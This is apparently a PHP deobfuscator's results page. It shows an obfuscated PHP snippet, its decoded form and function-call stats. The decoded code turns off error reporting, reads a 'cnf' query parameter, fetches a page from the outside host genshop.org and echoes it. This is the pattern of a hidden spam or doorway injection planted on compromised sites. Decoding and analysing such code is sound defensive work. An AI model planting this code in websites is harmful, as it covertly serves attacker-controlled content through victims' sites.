Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
$x0f="\143\x75r\x6c\x5fi\156\x69\164"; $x10="\143u\x72\154\x5f\163et\157\x70\164"; $x11="\..
Decoded Output download
<? $x0f="curl_init"; $x10="curl_setopt"; $x11="curl_exec"; $x12="curl_getinfo"; $x13="curl_close"; $x14="error_reporting"; $x15="header";
ini_set('display_errors','off');$x14(0);if (isset($_GET['cnf'])) {$x0b = $_GET['cnf'];$x0c = "http://genshop.org/nsites/en/new/57/".$x0b.".html";$x0d = $x0f();$x10($x0d, CURLOPT_URL, $x0c);$x10($x0d, CURLOPT_HEADER, 0);$x10($x0d,CURLOPT_RETURNTRANSFER,1);$x10($x0d, CURLOPT_TIMEOUT, 5);$x0e = $x11($x0d);if ($x12($x0d,CURLINFO_HTTP_CODE)==200) {echo $x0e;exit;}else {$x15('HTTP/1.0 404 Not Found'); echo '<h1>Not Found</h1>';}$x13($x0d);exit;} ?>
Did this file decode correctly?
Original Code
$x0f="\143\x75r\x6c\x5fi\156\x69\164"; $x10="\143u\x72\154\x5f\163et\157\x70\164"; $x11="\143\x75rl\x5f\x65x\145c"; $x12="\143\165r\x6c\137\147e\164\x69nf\157"; $x13="\x63u\162l\137\143\x6c\157se"; $x14="\x65\x72\162o\x72_r\145\x70o\x72\x74\151\x6eg"; $x15="\x68\145\x61\144\145\x72";
ini_set('display_errors','off');$x14(0);if (isset($_GET['cnf'])) {$x0b = $_GET['cnf'];$x0c = "h\x74\x74\x70:\057/\x67\145n\x73hop\x2e\157\162\147\057\x6e\x73it\145\x73/\145n\x2fne\167\x2f5\x37\x2f".$x0b."\056\x68\164ml";$x0d = $x0f();$x10($x0d, CURLOPT_URL, $x0c);$x10($x0d, CURLOPT_HEADER, 0);$x10($x0d,CURLOPT_RETURNTRANSFER,1);$x10($x0d, CURLOPT_TIMEOUT, 5);$x0e = $x11($x0d);if ($x12($x0d,CURLINFO_HTTP_CODE)==200) {echo $x0e;exit;}else {$x15('HTTP/1.0 404 Not Found'); echo '<h1>Not Found</h1>';}$x13($x0d);exit;}
Function Calls
ini_set | 1 |
curl_init | 1 |
error_reporting | 1 |
Stats
MD5 | ce0f116fa5bbbb11dabd9d4406903bc2 |
Eval Count | 0 |
Decode Time | 147 ms |